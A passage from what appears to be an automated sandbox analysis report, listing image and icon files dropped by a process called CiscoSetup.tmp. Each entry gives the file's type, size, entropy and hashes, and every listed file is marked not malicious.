                                                                                                                                      SHA-512:ACEC3FD68209F5AF45FC0736ECD9DB2441E69BD0A0DC43C45CEF2529BDC14B4D4A41696C0BED6E11876F066E137D29E270866FE86F3A20FC4CB9F09BA0EFE0AC
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:MS Windows icon resource - 2 icons, 32x32, 32 bits/pixel, 16x16, 32 bits/pixel
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):5430
                                                                                                                                      Entropy (8bit):3.4144936482461397
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:xLEWi6fEolR+vy+f7I8QbmvTn+3vCpK+hxZBBBpkbGgo2uo:xLV7EolbUISLn+3UBZBBBpkbGg6o
                                                                                                                                      MD5:68A2EA89135A31CE9E3E598F981433E0
                                                                                                                                      SHA1:1E2DABDFE730EAFD9A21F09C0E8E7F84E159E115
                                                                                                                                      SHA-256:73A199B9058AE8665DE3AD7792A7EE5DF7ADD2A4F2D8EFF49D81F221E8AFF85E
                                                                                                                                      SHA-512:CBCF48A63EA4CDC853950D2240B216EC8037E5CF0DFA9DA590C9F3749D5090406CA00CFCC5F844A7024ADD80B113F49F2F7D7F3D739F813360DA47720418DAC2
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 201 x 201, 8-bit/color RGBA, interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):14308
                                                                                                                                      Entropy (8bit):7.981829207860698
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:384:XybKkbzXX5gnaVvNX5HqQiVAlwokisiMCb9sdP4++2SC7a1Rj2:XFyBr5KAworb9sB4Yi0
                                                                                                                                      MD5:1FC5657F3DDBAE57EA997277C9D6488A
                                                                                                                                      SHA1:2C4A261FEA797112FF95ABDB008435329BC8C048
                                                                                                                                      SHA-256:DC39DF1AECA15B0BAD3E15D05CE917D3CB7CB00C4F363BE67AC5741F82E5A57A
                                                                                                                                      SHA-512:CA37C34378244C91AC316717B1DFBA2E3D596918F9000710ECDF503728C2C207031F71224410CE661AADB59DB5272EF993A0826E96D311784F32BDE7BA125440
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 534 x 534, 8-bit/color RGBA, interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):29723
                                                                                                                                      Entropy (8bit):7.971507308971378
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:768:f/oVoAjsba3qfpgr/jKyV8xonTTdZPNE/ZIeb4p82Xg:fwZ6tyHTTdERbkp8Mg
                                                                                                                                      MD5:DDF9FC987801BDE753D2C37733DE7F3D
                                                                                                                                      SHA1:BDA65E600F5EDD2889244E2C1CEAD37C1C292FC8
                                                                                                                                      SHA-256:D62A61171CAAD9B43DBCE2683DB87959B2C1FCB303D6B34A3DC1D178A9745F44
                                                                                                                                      SHA-512:D1C0451C3E9B52920A56EDF57CCF3617662E18B14E0E0B00A94D948574431C30E1C31BA2FF6F4BBFA8E01D42B00EA90FD03CD1D3991B3ACF04C5C9802F547244
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):388
                                                                                                                                      Entropy (8bit):7.139959170245274
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12:6v/7Hel//IgFAkq3Dhp5tRX3Sq+IeSzgKOg6p2e:aehvFXSELAgKja2e
                                                                                                                                      MD5:34C2847A763607A881B1E9A81CA9A4DC
                                                                                                                                      SHA1:B6050C2A1AA45C78F273B76FB729158E0F172D18
                                                                                                                                      SHA-256:4D735FCC94C53B0753F49E2656EE480D37F4899520F17C48FF7D1F0DDC2A9A8C
                                                                                                                                      SHA-512:8E3C4C1F62BDF79B2C5263D0C4DD97E302261A0C5C9399C13FADD3E25301F7DDA7297ECE3A8352534C9DA4B3A23FFE497FD61BDA348D14BB6658AF2C66863727
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 38 x 30, 8-bit/color RGBA, non-interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):3638
                                                                                                                                      Entropy (8bit):7.889316799889741
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:96:TSDZ/I09Da01l+gmkyTt6Hk8nTH6gOjEda8+nWKHD:TSDS0tKg9E05THXOodrpKHD
                                                                                                                                      MD5:ADDC960D6A70987420055E0DEBCF4250
                                                                                                                                      SHA1:AF1D0C9386C1ADC774FC167F69B89637F414BED9
                                                                                                                                      SHA-256:B19F731C03166DB50BA5E0F0AD70A48E1223E7DD57B051A3DFB8CC23FBFAB482
                                                                                                                                      SHA-512:8F6D2CFA6BF8406CB2954029C0A43F3871C2C35E19CC0580925D4E847BFC6377749AB2A3FBF8CA030D55AEC3729AED6F54F7D7534A593A24927C8E274A811E1D
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 101 x 101, 8-bit/color RGBA, non-interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1856
                                                                                                                                      Entropy (8bit):7.845521158056495
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:M5K2A2T3d0z5uOpdNSaQfbDS3YsPWaU3SjmUjm42rh:Mg2A9z5Fp1W3otPW5p
                                                                                                                                      MD5:AFAF04A11862845AFC31D64F7762D28E
                                                                                                                                      SHA1:C5E99C3DC321086738CB7BCF13EFF55EBDF1D3CF
                                                                                                                                      SHA-256:6797601AA69F2B489ADAB85A6DA73E78D4E041D24598BC726A3E837D2BE2D75E
                                                                                                                                      SHA-512:3D463D3EA19E87E8B592974BF4B69F4F6F5DE08975BB04AB0C180AE7CC49C9866E7B40F2D5890E50E7BF0FE2F8830125335FECB7C4FED8F2AF6045F8E66E18B4
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 48 x 48, 8-bit/color RGBA, non-interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):4052
                                                                                                                                      Entropy (8bit):7.943954771539964
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:96:YVzyamWl9ZWA1xj7kdJwie8o1NqPw1AT2Z1OHXe:q5t9ZWmlsy9qPw1AT2Z2e
                                                                                                                                      MD5:0356D0A27BC2E9B55F5603D0373CED4C
                                                                                                                                      SHA1:7572FB4DC3B1CEF66F38F68A29093D3FBE706A5E
                                                                                                                                      SHA-256:E5427AAA99BFC3CC3886351EC9B7C4C524799CF4A0DE0E0CF6D8DE3C0DFB8743
                                                                                                                                      SHA-512:6BB3E1168712BCAE7F5B67F92A60B58B74162A01225AE264B0A72CDC2CE0C3943A7E9AE47406AFBAE44C25870A877C5EE83142C40EE4BFA6C57DEC495B1C53BE
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 534 x 534, 8-bit/color RGBA, interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):29327
                                                                                                                                      Entropy (8bit):7.967732566337996
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:768:kfiUT6EuEADj9MKT8NYMSNQ0Ksn1GStodN2AG1:kfTGGYRKK1GStodNw
                                                                                                                                      MD5:A0FE71E2020412BD9FFEB2712628DAD0
                                                                                                                                      SHA1:33EBF21B46A1742A46DEEE2EADB0F714B4F64959
                                                                                                                                      SHA-256:3AF5729F9A5902B409FD0D79BA1B04AF2ABDB25BCB4750F235BD61DC2EEE7C77
                                                                                                                                      SHA-512:D4886F29044F3B6A1FB900AF1973362B6822085544ED65877B2F555B360E494912AAFFDA58E49C8A91ED541F9D18482A1811C9350074797416CC8ECD06CC1863
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:MS Windows icon resource - 2 icons, 32x32, 8 bits/pixel, 32x32, 24 bits/pixel
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):5494
                                                                                                                                      Entropy (8bit):1.0468421318534369
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:6:rlL14RyS5lhJEO7dVVvydaS+Qu7lfTllv7l3Jl//lHNlP4lp4lX4lR4lf4l54lng:xh4r3rEOKJmfGJ5
                                                                                                                                      MD5:223CC34A3299A5777171F41DF8453CDD
                                                                                                                                      SHA1:559AA03C2FB5D602B4116C16A7D73EE81C99F37B
                                                                                                                                      SHA-256:7E62C5A39DCDD0DFB69F1CCC882579D71DFD4DD345828318F1170AC48ED7F934
                                                                                                                                      SHA-512:5DC60D3801387F534A126D0DE4336993954274BE9696A0D73CE3161C6B2D36B7DCFFC38AD714CCD0CFBDB397FECC9DF845AF4B65215249A7637321F38A5033D6
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 200 x 201, 8-bit/color RGBA, interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):13727
                                                                                                                                      Entropy (8bit):7.982847912604664
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:384:63aRGz9MobH6FYdTA1tjCtZPXq5Sc5Li2H2E:v29jH6FJ1YnyLii2E
                                                                                                                                      MD5:2DDF6BB80F9B33B219E448F37ED394C0
                                                                                                                                      SHA1:BD1D1397D9011D9CF81D1061095CEA39C81AEE56
                                                                                                                                      SHA-256:8CB70AAF7D9D0C98AF0E6C640A78A2D4CABA2DC3DA8876208AD9A617A6E7A226
                                                                                                                                      SHA-512:00E86EDC454CF26E50D8AEEDF2CBC031E79F609E280E27FA87381CE6C7F9F6A8611FFC6EB1075BE271F0E864EDAAE89FDB25502BCB34C66412B6504C370154CF
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):472
                                                                                                                                      Entropy (8bit):7.339402871750466
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12:6v/7IEzFffWxjBiqsoNKXcQjmUVQtaaHI:hI0RBiqJycQjmU6t9HI
                                                                                                                                      MD5:AE59E69F9BB8D40D28E2C195A5F131BD
                                                                                                                                      SHA1:1AC9ED0DD66CEFA5F515A8C0D51A3E26B7F2F6A9
                                                                                                                                      SHA-256:271F2C4002F0127CD049A9BEEED8474FACED3217E7BB0C6DDEB8B34F8536FA8E
                                                                                                                                      SHA-512:D69C0C2F7C190D1795A5C6455949C0B7F63D678785C170D8DB4A7D3FF88A048D954C8236E750D2F38CAD6CED9072DA7E8E3B5B384465074637D43390D9857C26
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):478
                                                                                                                                      Entropy (8bit):7.3703130572324955
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12:6v/7xE0NSVUvFAccOOfACD09VvVupRqR5/MXMmxHlWX:YY+vFr+cvV8w3MXMm+
                                                                                                                                      MD5:D3BD002D9E657FC264347FE2FE45EE8D
                                                                                                                                      SHA1:8EC6528F2E8A07036C5D5F439FA0438C99CE814E
                                                                                                                                      SHA-256:B17D8F8BC1B971962A798743630816DFEF50526A2692BB458A7B1B6A546D28B0
                                                                                                                                      SHA-512:3BF535A63BCE729ABD443CA4265147DB46DFF698BC2AA27C7FFE430527F7C4FD921AFFBD6E789BC00EAC4DFFE300E82488A8C4886DC9D629DCA6B5CF905C0624
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 534 x 534, 8-bit/color RGBA, interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):26026
                                                                                                                                      Entropy (8bit):7.927985837095832
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:768:TKQua9HUsr5RRxO5oEt9jwIZmYCEHme0KV:+Xa9RLxO5o29jNGEGk
                                                                                                                                      MD5:5DC7A6BEE91DE8331C802B1647F5AD10
                                                                                                                                      SHA1:D9F8150235EF917E6884AA963C292530AE7ED599
                                                                                                                                      SHA-256:4D9B3A95A941BD32E42171770195872958DB56A6C2CB6FAE664500E947911149
                                                                                                                                      SHA-512:BC32B66AD44C88DB95995B08A4A2E7D420035CC02318756AD10F854B884B613C8CEE3017E7708B7E4865B06961B7292CBD91B3091B0BC61889A71A06C5A17E98
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 200 x 201, 8-bit/color RGBA, interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):13633
                                                                                                                                      Entropy (8bit):7.975971786407776
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:384:6MOtUX/uOlpyiGD809Mt039VytL65doCQc:1NWFl809Mt0j0Lap
                                                                                                                                      MD5:9C88E64458F50120E89167040B55A41C
                                                                                                                                      SHA1:8A43DFC4B9ED2CB460A024562405302468185A09
                                                                                                                                      SHA-256:E1E3C1C59B21F0F49EC9DB747C14760EC2068394F739A2E456F20A25E40AD24D
                                                                                                                                      SHA-512:7EACCCFC904D52AA13214757309858F4083F5CD8C06D6442F3C3F361A2AD01865C4A816240F3B87B63052F33AB96EB08F0C504A1CF0110C569D64350948B3BD8
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 534 x 534, 8-bit/color RGBA, interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):28939
                                                                                                                                      Entropy (8bit):7.960017526195935
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:768:OkJC2FKvbdu0G3091/3+WVlQkJyE3MNLc37Wr65:FCQmc0390W0kT8ll8
                                                                                                                                      MD5:B52EAA7318111371B2B8EF3425AD4405
                                                                                                                                      SHA1:DB16F9570B55F8045FE8354ACC853655791557AA
                                                                                                                                      SHA-256:C33C036B94E3BD83D393E552CE87784BA9F74D2B8563162024DAF7ED05E7EF6D
                                                                                                                                      SHA-512:AA98F3130A76BCD5FAF093886472F1A937E93AD0A8E83C00F9675C14C7AFC5DF903C52DE64FBAD6012F5DF54A1DB56759481BA8516C0DB0A851B6BE87FD13DFF
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 301 x 301, 8-bit/color RGBA, non-interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):12068
                                                                                                                                      Entropy (8bit):7.961027992023309
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:192:ukEiqZZQXKSmwL4v9UIqsQ8Dfn0Mv2RYkTONqT0oHrkbthyZpLpXrCAfrdag8csp:uViqZZQXKSmwL4VXJhsYOTynyZpNmAjE
                                                                                                                                      MD5:7E7FE0627B08E07FEE4ED11C41A9BA59
                                                                                                                                      SHA1:E3C6036975AD146D70AE76158EEBD3D8109B0C7F
                                                                                                                                      SHA-256:019183BF0C9A25E37A7EB74ABB3DC7848C1A729BBDA1F557E26A5322DBAF11E2
                                                                                                                                      SHA-512:30E68B932388A840F92D45AA97C3B9CC012C28F36DE93D315B107C7223DCBFBF94A54A09492E930642555828FCB3F6CA519F75BE6EA451DFF7B1D2F5B8FA2472
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 200 x 201, 8-bit/color RGBA, interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):11747
                                                                                                                                      Entropy (8bit):7.9792800328394184
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:192:6O6eUrSbvYvQ77S7PmrQJhWxQLVBinCEBWLp41ZvPaiTlShB9R022uRx1ohfiq:67RSbAvQyCED4QLVBiCLLS1hhMv022u6
                                                                                                                                      MD5:49E51BACF675B9DF74CD84F600645F0F
                                                                                                                                      SHA1:563FBED61D83375EE51DD85FD7DC71B53D048ADF
                                                                                                                                      SHA-256:25EA8BC480B6E97548BD3F64ED6128686C06CAFAA772025B24C2F52CE39B137A
                                                                                                                                      SHA-512:3231ED2D95E3B2DD1AF2956D3FB29EC7D6AC2D8A5FA6CF12DDA967BCA25CBB3D69B393265B38592B8DB62CC93D55903BE827BD5AC5E119DB5D80E2CE54DDA084
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:MS Windows icon resource - 2 icons, 32x32, 32 bits/pixel, 16x16, 32 bits/pixel
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):5558
                                                                                                                                      Entropy (8bit):4.450533821817726
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:96:vcn7ngbW2IU8R9Lq+LhfSnuX31xEqxpkg:E74IU8R9LqMTFxz
                                                                                                                                      MD5:EAF0F00DA8BB1D384B8A5BB3B82D0A54
                                                                                                                                      SHA1:2E7021D20D962F4568A51757B2D9B7408624740E
                                                                                                                                      SHA-256:86D5102E01D6D29D5AEE6E87E827B8C624D7B552035C9AFDB0BE2B120E4A553F
                                                                                                                                      SHA-512:57358DEA1B8A75A8FEEE29F9D83931D65672B228B93CE6C9CFEEBA3C77FD9FDB8D7B7D4A1F3188D8CBC2FEBF8B427F574791E6210580499788FF101641C01854
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 3226 x 2235, 8-bit/color RGBA, interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):75452
                                                                                                                                      Entropy (8bit):6.447447333863436
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:1536:i6ORO3YabolewEiM0aJqCrvbURQDEb6b/4:ik3dolewM0agCrImD3w
                                                                                                                                      MD5:9C6F8BF269230734B04A82F610B9B912
                                                                                                                                      SHA1:2B81B2C45C94CA29330ED0223F21928BEAA66A3D
                                                                                                                                      SHA-256:3A5C49B91E68BE97E158E7A35C54996C45F1E9E8432927AF476D5F85BCF7B67E
                                                                                                                                      SHA-512:4F24CAD91616F50E1C28E0D44C66B0F6E6C89F38E9A07B81C43810862F3E76E77D897D6B06BB7CD2FEFDFC1E01011FA1CEBCDF2E6E53F347E98B9CEF7FCBF1C9
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 201 x 200, 8-bit/color RGBA, interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):8950
                                                                                                                                      Entropy (8bit):7.969730039207073
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:192:p96ObyGv4LCovtazAkU/bm8oT+4UObs9KhHU1gL3c2/Rqw:tbtuCovtazCDdxObJ5UM3hh
                                                                                                                                      MD5:4F8EBA018E164B7A5FFDA205576989E8
                                                                                                                                      SHA1:56669FFFC614C2577370B0EF84EA6EA4FFE89858
                                                                                                                                      SHA-256:815EACDBC62FED323EB3D0BBAD4596C0D699862A66258A4F994B78CE520389A1
                                                                                                                                      SHA-512:F9CBDEE29FD372DEA72C6039E705A192B2C751927490B811317CE74A56DBEF1B4C17D05D1CC29A32F060C6A761D93CDB5D2AF6C76853427F5341D7C6DA4F44E7
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 301 x 301, 8-bit/color RGBA, non-interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):12558
                                                                                                                                      Entropy (8bit):7.968059020803266
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:384:uop8Zgd6lZbxmfVR68Sj8p3f/NMolH6FeIB9OxW:uo6Z4Ic6potlg
                                                                                                                                      MD5:D30964E871F60B296F5109215FC341DC
                                                                                                                                      SHA1:365DDAFC27D304BBB3B8A99D0A62504E5D2D0B03
                                                                                                                                      SHA-256:16FDE630F3C55080422FE6965CE08D3CA85168655C73E05E3F9B7C00DC14507A
                                                                                                                                      SHA-512:22E918B1187909FCF80ED6ED091ADFA6081E95A2482F6676DA84D8CD580CD4557D9FBDCDD948ACEA03A8001BABA4653F4C735672F668DB9D226F9362A079358E
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 3563 x 1383, 8-bit/color RGBA, interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):83426
                                                                                                                                      Entropy (8bit):7.358868361468608
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:1536:dixvvTkILgVLxXyJl/WOwiu/PK7KT+vWJv1RASI/sH4PIfeN9Oo:avvTfg5Fyv/WOwiurQWJ9e0H4PoeTOo
                                                                                                                                      MD5:4AC53A86840972B2C8E661710290F3ED
                                                                                                                                      SHA1:D305EC46D2A933DA35D0634B1C23B2657A70CA88
                                                                                                                                      SHA-256:647EFCB4DF9273570A803D5818A37814601B06D41D77A51B61461B12958F028C
                                                                                                                                      SHA-512:86CCC7CA3A4EC721DB91B498E05C4DED79B3BF88E3AF5BCA4198380742B79C69AFF7BCDE7CE15FC09D1C976C37E56298EC3BECAD9254242ACCFAD9CBD6159BA4
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 16 x 12, 8-bit colormap, non-interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):3880
                                                                                                                                      Entropy (8bit):6.742220289284142
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:ildHE8+JjpMNNa3OjboViS4nXsAYdPd3F58ZpiU54SN775OBcr:iXHt+JcNgOSiS4XsAYNpf2ESNVr
                                                                                                                                      MD5:3C512CF63246231506E533D6800FF3EB
                                                                                                                                      SHA1:CF02F3D7AD80DC48B900464D1F8D828F44213443
                                                                                                                                      SHA-256:C211B550E4DF39BDD1E7A39E7979EBFEAB155BDAEF2498A09D63B45713C30768
                                                                                                                                      SHA-512:ECE459102971594D5EB348FF9AA16E5EC0E7222594D63096289B566B07D020B534947D231E6C3CA1E139F407B9A5251933CF38C7BCEDAE693741499A9108D9D6
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 38 x 30, 8-bit/color RGBA, non-interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):3683
                                                                                                                                      Entropy (8bit):7.90204028759812
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:96:TSDZ/I09Da01l+gmkyTt6Hk8nTuU1G4X0vy:TSDS0tKg9E05TuGG4k6
                                                                                                                                      MD5:4D8816B117672123F84ECD051877A37D
                                                                                                                                      SHA1:C9983DE5E4DD52660A109C418DBDA7B7F202E2E8
                                                                                                                                      SHA-256:3D2A9058537240F9131F6A8D083A6723A0D45E31BF2BBA4EA761DE23948C8209
                                                                                                                                      SHA-512:63395803D1BED8B33E1854D6EC5EEF2322FFE69B5150CF414692D7AE8003ABA601FB283C8CB661ED4AD633B4ACF945AADC579A84910441963F8EE801D0CEB447
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 5334 x 1067, 8-bit/color RGBA, interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):83111
                                                                                                                                      Entropy (8bit):7.138058183615623
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:1536:VC5Kuc25xWuSyREGUa7eZoQZBrMd+Wdl6P1NsDO1U:VC5Dx8yRTeBZW4k9DOu
                                                                                                                                      MD5:E9352AD002DC71C84B605700A6684C46
                                                                                                                                      SHA1:312487A0D0778CB57EBC0B5ABBA29CB6C31187FA
                                                                                                                                      SHA-256:55E9F9561425D5B5994506DB5932FF3C87ACAD729BB4CC043EE99EFB85484E0A
                                                                                                                                      SHA-512:CAC779DCB625BF8C8736686407BB81DB140434FB16DC98144E113F2822AB3A907A7E7CA63751D73604B11EF0F0DFCB6979833DE75B160542CF7C969F39533867
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 3226 x 2235, 8-bit/color RGBA, interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):76615
                                                                                                                                      Entropy (8bit):6.470162664157233
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:1536:qGdM/siSNo+PH4MwDCfwvTaBFdzIWxtLudTc8OuTk3kMgH/0:q5sioYMwL7aBF1x0dTcqTFf0
                                                                                                                                      MD5:BCB76C77C4A705631EAECEAD63D6A8EF
                                                                                                                                      SHA1:915C69643CCCB39E4DED27AC866C3F6872D740A2
                                                                                                                                      SHA-256:C5A9EB1365BF8D546649281DE3C9E31FB27F9E39B54BC860961F026E95D653B2
                                                                                                                                      SHA-512:07349A6E550BDC44091329DF5303EB9BB845E54926346ACD9D5FA74FD9F596E73B3D04FD1098079564D4EEB9FBB03F7F9126C0D16433DE9456C5556741B06121
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 48 x 48, 8-bit/color RGBA, non-interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):4117
                                                                                                                                      Entropy (8bit):7.943813748161345
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:96:79m160UrZetyDZrcRzRB+6nB49EkDPzkWb9PhkqjhqBx1DNo:79G6xr6yVrkzRB+UkEWb9pji1DNo
                                                                                                                                      MD5:04127248AAA5B7D32DC2DE4F02DA025F
                                                                                                                                      SHA1:6509E437F6503A9975953B955054D29ACE439D5F
                                                                                                                                      SHA-256:946B8C23BF05558B52D273502A65731A5E412C9E02A544748C5E5C27A3ED6D0D
                                                                                                                                      SHA-512:F26907895DAAEEE025FB20BCD22803F1151A5D5037B85FF1DCD71DA98E78C417996C08759F646D8E463FB6DD43A36F10092746D6520F9C70BE4AC03AF3B5F48A
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 16 x 12, 8-bit colormap, non-interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):3882
                                                                                                                                      Entropy (8bit):6.743390042757195
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:ildHE8+JjpMNNa3OjboViS4nXsAYdPd3F58ZpiU54SN775OBcXLBz:iXHt+JcNgOSiS4XsAYNpf2ESNV7Bz
                                                                                                                                      MD5:3FFF593238B9889FAFEB8D0128212244
                                                                                                                                      SHA1:D7D9421F3DAB1DF9ED621322554EA78444513815
                                                                                                                                      SHA-256:FDA8EE98D597820B24B2AAE23909585D4E5BFD0FDC573F901FA6139A30D9A2F0
                                                                                                                                      SHA-512:4BC00D211799B3C09BA0BFBEB676E2F03A9E510D89CFBF4CFEEAAB47232A782E756F67B6194D551B7659741E1114D0BD648B88EDD02BE43C32D4E2BB2ACC1339
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 200 x 200, 8-bit/color RGBA, interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):10710
                                                                                                                                      Entropy (8bit):7.9641316394298025
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:192:Aowo3FbryCXdxyG2En+b5eUJf1Q6pPZ3LxElBt/wVUuv04YKmECa:AowqbrvX3h1+b5eMdQDY3v0da
                                                                                                                                      MD5:5412237E7D26A5CB2F3F8891B9E36462
                                                                                                                                      SHA1:778ABA750AFD4D5518A5B7EDE1F73E7A016883C8
